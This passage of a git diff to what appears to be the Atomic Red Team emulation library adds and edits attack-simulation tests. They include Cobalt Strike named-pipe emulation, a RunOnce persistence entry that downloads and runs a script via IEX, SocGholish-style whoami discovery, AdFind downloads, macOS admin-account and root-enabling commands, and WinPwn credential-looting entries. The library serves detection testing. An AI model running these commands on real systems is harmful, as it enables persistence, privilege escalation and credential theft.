+        name: command_prompt
+    - name: Cobalt Strike Lateral Movement (psexec_psh) pipe
+      auto_generated_guid: 830c8b6c-7a70-4f40-b975-8bbe74558acd
+      description: |
+        Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+
+        The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+      supported_platforms:
+      - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Named pipe executors must exist on disk
+
+          '
+        prereq_command: 'if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe))
+          {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+          $zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+          Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+      executor:
+        command: '"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe
+          2
+
+          '
+        name: command_prompt
+    - name: Cobalt Strike SSH (postex_ssh) pipe
+      auto_generated_guid: d1f72fa0-5bc2-4b4b-bd1e-43b6e8cfb2e6
+      description: |
+        Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+
+        The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+      supported_platforms:
+      - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Named pipe executors must exist on disk
+
+          '
+        prereq_command: 'if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe))
+          {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+          $zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+          Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+      executor:
+        command: '"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe
+          3
+
+          '
+        name: command_prompt
+    - name: Cobalt Strike post-exploitation pipe (4.2 and later)
+      auto_generated_guid: 7a48f482-246f-4aeb-9837-21c271ebf244
+      description: |
+        Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+
+        The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+      supported_platforms:
+      - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Named pipe executors must exist on disk
+
+          '
+        prereq_command: 'if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe))
+          {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+          $zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+          Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+      executor:
+        command: '"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe
+          4
+
+          '
+        name: command_prompt
+    - name: Cobalt Strike post-exploitation pipe (before 4.2)
+      auto_generated_guid: 8dbfc15c-527b-4ab0-a272-019f469d367f
+      description: |
+        Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+
+        The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+      supported_platforms:
+      - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Named pipe executors must exist on disk
+
+          '
+        prereq_command: 'if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe))
+          {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+          $zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+          Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+      executor:
+        command: '"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe
+          5
+
+          '
+        name: command_prompt
   T1204.003:
     technique:
       x_mitre_platforms:
@@ -53421,7 +53573,7 @@ persistence:
       executor:
         command: |
           $RunOnceKey = "#{reg_key_path}"
-          set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/36f83b728bc26a49eacb0535edc42be8c377ac54/ARTifacts/Misc/Discovery.bat`")"'
+          set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1547.001/src/Discovery.bat`")"'
         cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun"
           -Force -ErrorAction Ignore
 
@@ -53471,7 +53623,8 @@ persistence:
     - name: Suspicious bat file run from startup Folder
       auto_generated_guid: 5b6768e4-44d2-44f0-89da-a01d1430fd5e
       description: |
-        bat files can be placed in and executed from the startup folder to maintain persistance.
+        bat files can be placed in and executed from the startup folder to maintain persistance
+
         Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
         folder and will also run when the computer is restarted and the user logs in.
       supported_platforms:
@@ -73558,6 +73711,36 @@ discovery:
           -FilePath .\\CurrentUserObject.txt\n"
         cleanup_command: 'Remove-Item -Path .\CurrentUserObject.txt -Force
 
+          '
+        name: powershell
+    - name: System Discovery - SocGholish whoami
+      auto_generated_guid: 3d257a03-eb80-41c5-b744-bb37ac7f65c7
+      description: "SocGholish performs whoami discovery commands and outputs the
+        results to a tmp file. \nThe test will generate a filename similar to the
+        random one generated during execution and write the file to AppData\\Temp.\n\nReference:
+        https://redcanary.com/threat-detection-report/threats/socgholish/\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        output_path:
+          description: Location of output file
+          type: string
+          default: "$env:temp"
+      executor:
+        command: |
+          $TokenSet = @{
+            U = [Char[]]'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
+            N = [Char[]]'0123456789'
+          }
+          $Upper = Get-Random -Count 5 -InputObject $TokenSet.U
+          $Number = Get-Random -Count 5 -InputObject $TokenSet.N
+          $StringSet = $Upper + $Number
+          $rad = (Get-Random -Count 5 -InputObject $StringSet) -join ''
+          $file = "rad" + $rad + ".tmp"
+
+          whoami.exe /all >> #{output_path}\$file
+        cleanup_command: 'Remove-Item -Path $env:temp\rad*.tmp -Force
+
           '
         name: powershell
   T1613:
@@ -74088,10 +74271,9 @@ discovery:
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
           '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
       executor:
         command: "#{adfind_path} -default -s base lockoutduration lockoutthreshold
           lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength
@@ -74117,10 +74299,9 @@ discovery:
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
           '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
       executor:
         command: "#{adfind_path} -sc admincountdmp\n"
         name: command_prompt
@@ -74144,10 +74325,9 @@ discovery:
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
           '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
       executor:
         command: "#{adfind_path} -f (objectcategory=person)\n"
         name: command_prompt
@@ -74171,10 +74351,9 @@ discovery:
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
           '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
       executor:
         command: "#{adfind_path} -sc exchaddresses\n"
         name: command_prompt
@@ -74362,15 +74541,6 @@ discovery:
         code 4776 from the domain controller and stores the ouput in C:\\temp. [Reference](https://www.reliaquest.com/blog/socgholish-fakeupdates/)\n"
       supported_platforms:
       - windows
-      input_arguments:
-        Domain:
-          description: Domain that is being tested against
-          type: string
-          default: "$env:USERDOMAIN"
-        DomainController:
-          description: Domain Controller that is being tested against
-          type: string
-          default: "$env:UserDnsDomain"
       executor:
         command: wmic /node:$env:UserDnsDomain process call create 'wevtutil epl Security
           C:\Temp\ntlmusers.evtx /q:Event[System[(EventID=4776)]]'
@@ -74842,6 +75012,7 @@ discovery:
           '
         get_prereq_command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
       executor:
         command: "#{adfind_path} -f (objectcategory=group)\n"
@@ -76064,6 +76235,7 @@ discovery:
       - 'Cloud Storage: Cloud Storage Metadata'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1580
     atomic_tests: []
   T1217:
     technique:
@@ -76342,10 +76514,9 @@ discovery:
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
           '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
       executor:
         command: "#{adfind_path} -f (objectcategory=subnet)\n"
         name: command_prompt
@@ -76615,10 +76786,9 @@ discovery:
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
           '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
       executor:
         command: "#{adfind_path} -f (objectcategory=organizationalUnit)\n"
         name: command_prompt
@@ -76642,10 +76812,9 @@ discovery:
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
           '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
       executor:
         command: "#{adfind_path} -gcb -sc trustdmp\n"
         name: command_prompt
@@ -78427,10 +78596,9 @@ discovery:
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
           '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
       executor:
         command: "#{adfind_path} -f (objectcategory=computer)\n"
         name: command_prompt
@@ -78454,10 +78622,9 @@ discovery:
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
           '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
       executor:
         command: "#{adfind_path} -sc dclist\n"
         name: command_prompt
diff --git a/atomics/T1016/T1016.md b/atomics/T1016/T1016.md
index 914b775b..2f76311b 100644
--- a/atomics/T1016/T1016.md
+++ b/atomics/T1016/T1016.md
@@ -288,6 +288,7 @@ if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
+New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
 ```
 
diff --git a/atomics/T1016/T1016.yaml b/atomics/T1016/T1016.yaml
index 7487524c..78d673a6 100644
--- a/atomics/T1016/T1016.yaml
+++ b/atomics/T1016/T1016.yaml
@@ -149,6 +149,7 @@ atomic_tests:
     prereq_command: |
       if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
     get_prereq_command: |
+      New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
       Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
   executor:
     command: |
diff --git a/atomics/T1018/T1018.md b/atomics/T1018/T1018.md
index 9cffa6be..3e4d9246 100644
--- a/atomics/T1018/T1018.md
+++ b/atomics/T1018/T1018.md
@@ -433,6 +433,7 @@ if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
+New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
 ```
 
@@ -479,6 +480,7 @@ if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
+New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
 ```
 
diff --git a/atomics/T1018/T1018.yaml b/atomics/T1018/T1018.yaml
index 37f06d8d..74f7d336 100644
--- a/atomics/T1018/T1018.yaml
+++ b/atomics/T1018/T1018.yaml
@@ -210,6 +210,7 @@ atomic_tests:
     prereq_command: |
       if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
     get_prereq_command: |
+      New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
       Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
   executor:
     command: |
@@ -234,6 +235,7 @@ atomic_tests:
     prereq_command: |
       if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
     get_prereq_command: |
+      New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
       Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
   executor:
     command: |
diff --git a/atomics/T1033/T1033.md b/atomics/T1033/T1033.md
index 0c860594..0c6b337f 100644
--- a/atomics/T1033/T1033.md
+++ b/atomics/T1033/T1033.md
@@ -16,6 +16,8 @@ Various utilities and commands may acquire this information, including <code>who
 
 - [Atomic Test #5 - GetCurrent User with PowerShell Script](#atomic-test-5---getcurrent-user-with-powershell-script)
 
+- [Atomic Test #6 - System Discovery - SocGholish whoami](#atomic-test-6---system-discovery---socgholish-whoami)
+
 
 <br/>
 
@@ -185,4 +187,54 @@ Remove-Item -Path .\CurrentUserObject.txt -Force
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #6 - System Discovery - SocGholish whoami
+SocGholish performs whoami discovery commands and outputs the results to a tmp file. 
+The test will generate a filename similar to the random one generated during execution and write the file to AppData\Temp.
+
+Reference: https://redcanary.com/threat-detection-report/threats/socgholish/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 3d257a03-eb80-41c5-b744-bb37ac7f65c7
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| output_path | Location of output file | string | $env:temp|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$TokenSet = @{
+  U = [Char[]]'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
+  N = [Char[]]'0123456789'
+}
+$Upper = Get-Random -Count 5 -InputObject $TokenSet.U
+$Number = Get-Random -Count 5 -InputObject $TokenSet.N
+$StringSet = $Upper + $Number
+$rad = (Get-Random -Count 5 -InputObject $StringSet) -join ''
+$file = "rad" + $rad + ".tmp"
+
+whoami.exe /all >> #{output_path}\$file
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item -Path $env:temp\rad*.tmp -Force
+```
+
+
+
+
+
 <br/>
diff --git a/atomics/T1033/T1033.yaml b/atomics/T1033/T1033.yaml
index 7cff4e22..fe0d3fcb 100644
--- a/atomics/T1033/T1033.yaml
+++ b/atomics/T1033/T1033.yaml
@@ -74,3 +74,34 @@ atomic_tests:
     cleanup_command: |
       Remove-Item -Path .\CurrentUserObject.txt -Force
     name: powershell
+- name: System Discovery - SocGholish whoami
+  auto_generated_guid: 3d257a03-eb80-41c5-b744-bb37ac7f65c7
+  description: |
+    SocGholish performs whoami discovery commands and outputs the results to a tmp file. 
+    The test will generate a filename similar to the random one generated during execution and write the file to AppData\Temp.
+
+    Reference: https://redcanary.com/threat-detection-report/threats/socgholish/
+  supported_platforms:
+  - windows
+  input_arguments:
+    output_path:
+      description: Location of output file
+      type: string
+      default: $env:temp
+  executor:
+    command: |
+      $TokenSet = @{
+        U = [Char[]]'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
+        N = [Char[]]'0123456789'
+      }
+      $Upper = Get-Random -Count 5 -InputObject $TokenSet.U
+      $Number = Get-Random -Count 5 -InputObject $TokenSet.N
+      $StringSet = $Upper + $Number
+      $rad = (Get-Random -Count 5 -InputObject $StringSet) -join ''
+      $file = "rad" + $rad + ".tmp"
+
+      whoami.exe /all >> #{output_path}\$file
+    
+    cleanup_command: |
+      Remove-Item -Path $env:temp\rad*.tmp -Force
+    name: powershell
\ No newline at end of file
diff --git a/atomics/T1069.002/T1069.002.md b/atomics/T1069.002/T1069.002.md
index 8800a1f5..7f90dc60 100644
--- a/atomics/T1069.002/T1069.002.md
+++ b/atomics/T1069.002/T1069.002.md
@@ -312,6 +312,7 @@ if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 ##### Get Prereq Commands:
 ```powershell
 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
 ```
 
diff --git a/atomics/T1069.002/T1069.002.yaml b/atomics/T1069.002/T1069.002.yaml
index 13d6c9ce..4f03a810 100644
--- a/atomics/T1069.002/T1069.002.yaml
+++ b/atomics/T1069.002/T1069.002.yaml
@@ -128,6 +128,7 @@ atomic_tests:
       if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
     get_prereq_command: |
       [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
       Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
   executor:
     command: |
diff --git a/atomics/T1078.003/T1078.003.md b/atomics/T1078.003/T1078.003.md
index 6353baa8..d5735498 100644
--- a/atomics/T1078.003/T1078.003.md
+++ b/atomics/T1078.003/T1078.003.md
@@ -10,9 +10,15 @@ Local Accounts may also be abused to elevate privileges and harvest credentials
 
 - [Atomic Test #2 - Create local account with admin privileges - MacOS](#atomic-test-2---create-local-account-with-admin-privileges---macos)
 
-- [Atomic Test #3 - WinPwn - Loot local Credentials - powerhell kittie](#atomic-test-3---winpwn---loot-local-credentials---powerhell-kittie)
+- [Atomic Test #3 - Create local account with admin privileges using sysadminctl utility - MacOS](#atomic-test-3---create-local-account-with-admin-privileges-using-sysadminctl-utility---macos)
 
-- [Atomic Test #4 - WinPwn - Loot local Credentials - Safetykatz](#atomic-test-4---winpwn---loot-local-credentials---safetykatz)
+- [Atomic Test #4 - Enable root account using dsenableroot utility - MacOS](#atomic-test-4---enable-root-account-using-dsenableroot-utility---macos)
+
+- [Atomic Test #5 - Add a new/existing user to the admin group using dseditgroup utility - macOS](#atomic-test-5---add-a-newexisting-user-to-the-admin-group-using-dseditgroup-utility---macos)
+
+- [Atomic Test #6 - WinPwn - Loot local Credentials - powerhell kittie](#atomic-test-6---winpwn---loot-local-credentials---powerhell-kittie)
+
+- [Atomic Test #7 - WinPwn - Loot local Credentials - Safetykatz](#atomic-test-7---winpwn---loot-local-credentials---safetykatz)
 
 
 <br/>
@@ -96,7 +102,105 @@ sudo dscl . -delete /Users/AtomicUser
 <br/>
 <br/>
 
-## Atomic Test #3 - WinPwn - Loot local Credentials - powerhell kittie
+## Atomic Test #3 - Create local account with admin privileges using sysadminctl utility - MacOS
+After execution the new account will be active and added to the Administrators group
+
+**Supported Platforms:** macOS
+
+
+**auto_generated_guid:** 191db57d-091a-47d5-99f3-97fde53de505
+
+
+
+
+
+
+#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
+
+
+```bash
+sysadminctl interactive -addUser art-tester -fullName ARTUser -password !pass123! -admin
+```
+
+#### Cleanup Commands:
+```bash
+sysadminctl interactive -deleteUser art-tester
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #4 - Enable root account using dsenableroot utility - MacOS
+After execution the current/new user will have root access
+
+**Supported Platforms:** macOS
+
+
+**auto_generated_guid:** 20b40ea9-0e17-4155-b8e6-244911a678ac
+
+
+
+
+
+
+#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
+
+
+```bash
+dsenableroot #current user
+dsenableroot -u art-tester -p art-tester -r art-root #new user
+```
+
+#### Cleanup Commands:
+```bash
+dsenableroot -d #current user
+dsenableroot -d -u art-tester -p art-tester #new user
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #5 - Add a new/existing user to the admin group using dseditgroup utility - macOS
+After execution the current/new user will be added to the Admin group
+
+**Supported Platforms:** macOS
+
+
+**auto_generated_guid:** 433842ba-e796-4fd5-a14f-95d3a1970875
+
+
+
+
+
+
+#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
+
+
+```bash
+dseditgroup -o edit -a art-user -t user admin
+```
+
+#### Cleanup Commands:
+```bash
+dseditgroup -o edit -d art-user -t user admin
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #6 - WinPwn - Loot local Credentials - powerhell kittie
 Loot local Credentials - powerhell kittie technique via function of WinPwn
 
 **Supported Platforms:** Windows
@@ -126,7 +230,7 @@ obfuskittiedump -consoleoutput -noninteractive
 <br/>
 <br/>
 
-## Atomic Test #4 - WinPwn - Loot local Credentials - Safetykatz
+## Atomic Test #7 - WinPwn - Loot local Credentials - Safetykatz
 Loot local Credentials - Safetykatz technique via function of WinPwn
 
 **Supported Platforms:** Windows
diff --git a/atomics/T1078.003/T1078.003.yaml b/atomics/T1078.003/T1078.003.yaml
index 2867ae15..f70aaa35 100644
--- a/atomics/T1078.003/T1078.003.yaml
+++ b/atomics/T1078.003/T1078.003.yaml
@@ -3,7 +3,6 @@ display_name: 'Valid Accounts: Local Accounts'
 atomic_tests:
 - name: Create local account with admin privileges
   auto_generated_guid: a524ce99-86de-4db6-b4f9-e08f35a47a15
-
   description: After execution the new account will be active and added to the Administrators group
   supported_platforms:
   - windows
@@ -22,7 +21,6 @@ atomic_tests:
       net user art-test /delete >nul 2>&1
     name: command_prompt
     elevation_required: true
-
 - name: Create local account with admin privileges - MacOS
   auto_generated_guid: f1275566-1c26-4b66-83e3-7f9f7f964daa
   description: After execution the new account will be active and added to the Administrators group
@@ -42,7 +40,45 @@ atomic_tests:
       sudo dscl . -delete /Users/AtomicUser
     name: bash
     elevation_required: true
-- name: WinPwn - Loot local Credentials - powerhell kittie
+- name: Create local account with admin privileges using sysadminctl utility - MacOS
+  auto_generated_guid: 191db57d-091a-47d5-99f3-97fde53de505
+  description: After execution the new account will be active and added to the Administrators group
+  supported_platforms:
+  - macos
+  executor:
+    command: |-
+      sysadminctl interactive -addUser art-tester -fullName ARTUser -password !pass123! -admin
+    cleanup_command: |-
+      sysadminctl interactive -deleteUser art-tester
+    name: bash
+    elevation_required: true
+- name: Enable root account using dsenableroot utility - MacOS
+  auto_generated_guid: 20b40ea9-0e17-4155-b8e6-244911a678ac
+  description: After execution the current/new user will have root access
+  supported_platforms:
+  - macos
+  executor:
+    command: |-
+      dsenableroot #current user
+      dsenableroot -u art-tester -p art-tester -r art-root #new user
+    cleanup_command: |-
+      dsenableroot -d #current user
+      dsenableroot -d -u art-tester -p art-tester #new user
+    name: bash
+    elevation_required: true
+- name: Add a new/existing user to the admin group using dseditgroup utility - macOS
+  auto_generated_guid: 433842ba-e796-4fd5-a14f-95d3a1970875
+  description: After execution the current/new user will be added to the Admin group
+  supported_platforms:
+  - macos
+  executor:
+    command: |-
+      dseditgroup -o edit -a art-user -t user admin
+    cleanup_command: |-
+      dseditgroup -o edit -d art-user -t user admin
+    name: bash
+    elevation_required: true
+- name: WinPwn - Loot local Credentials - powerhell kittie 
   auto_generated_guid: 9e9fd066-453d-442f-88c1-ad7911d32912
   description: Loot local Credentials - powerhell kittie technique via function of WinPwn
